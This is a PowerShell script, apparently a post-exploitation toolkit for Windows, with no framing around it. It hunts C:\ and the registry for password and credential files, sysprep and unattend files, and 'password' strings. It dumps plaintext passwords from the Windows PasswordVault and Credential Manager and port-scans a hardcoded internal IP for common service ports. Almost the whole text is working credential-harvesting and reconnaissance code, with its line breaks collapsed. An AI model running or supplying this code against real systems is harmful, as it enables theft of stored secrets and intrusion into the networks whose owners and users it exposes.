# Find Potentially Interesting Files Write-Host "Finding Potentially Interesting Files" -ForegroundColor Yellow gci c:\ -Include *pass*.txt,*pass*.xml,*pass*.ini,*pass*.xlsx,*cred*,*vnc*,*.config*,*accounts* -File -Recurse -EA SilentlyContinue # Find Credentials in Sysprep or Unattend Files Write-Host "Finding Credentials in Sysprep or Unattend Files" -ForegroundColor Yellow gci c:\ -Include *sysprep.inf,*sysprep.xml,*sysprep.txt,*unattended.xml,*unattend.xml,*unattend.txt -File -Recurse -EA SilentlyContinue # Get stored passwords from Windows PasswordVault Write-Host "Get Stored Passwords From Windows PasswordVault" -ForegroundColor Yellow [Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]; ` (New-Object Windows.Security.Credentials.PasswordVault).RetrieveAll() ` | % { ` $_.RetrievePassword(); ` $_ ` } # Get Stored Passwords From Windows Credential Manager Write-Host "Get Stored Passwords From Windows Credential Manager" -ForegroundColor Yellow Get-StoredCredential ` | % { ` Write-Host -NoNewLine $_.username; ` Write-Host -NoNewLine ":"; ` $p = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($_.password); ` [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($p); ` } # Port Scan a Host for Interesting Ports Write-Host "Port Scan a Host for Interesting Ports" -ForegroundColor Yellow $ports = "21 22 23 25 53 80 88 111 139 389 443 445 873 1099 1433 1521 1723 2049 2100 2121 3299 3306 3389 3632 4369 5038 5060 5432 5555 5900 5985 6000 6379 6667 8000 8080 8443 9200 27017" $ip = "10.1.0.4" $ports.split(" ") ` | % { ` echo ((New-Object Net.Sockets.TcpClient).Connect($ip,$_)) "Port $_ is open on $ip" ` } 2>$null # Potential Credentials Files function Find-CredFiles { Write-Host "Finding Potential Credentials Files" -ForegroundColor Yellow return (Get-ChildItem c:\ -Recurse -Include *pass*, *cred*, *.config*, *vnc* -ErrorAction SilentlyContinue | Where-Object { -not $_.PSIsContainer } | select fullname).fullname } # Files With 'Password' String function Find-PasswordFiles { Write-Host "Finding Files With 'Password' String" -ForegroundColor Yellow $passfiles = Get-ChildItem c:\ -Recurse -Include *.xml, *.ini, *.txt -ErrorAction SilentlyContinue | Select-String -pattern "password" -ErrorAction SilentlyContinue $passlist = @() foreach ($match in $passfiles){ $obj = New-Object psobject $obj | Add-Member NoteProperty 'FilePath' $match.Path $obj | Add-Member NoteProperty 'LineNumber' $match.LineNumber $obj | Add-Member NoteProperty 'Line' $match.Line $passlist += $obj } return $passlist } # Registry Values With 'Password' String function Find-RegPasswords{ Write-Host "Finding Registry Values With 'Password' String" -ForegroundColor Yellow return Get-ChildItem -path HKLM:\,HKCU:\ -Recurse -ErrorAction SilentlyContinue | % { $key=$_;$_.GetValueNames() | ? { $_ -match 'password' } | %{ Get-ItemProperty $key.pspath -Name $_ | select -ExcludeProperty PSProvider,PSChildName,PSParentPath } } }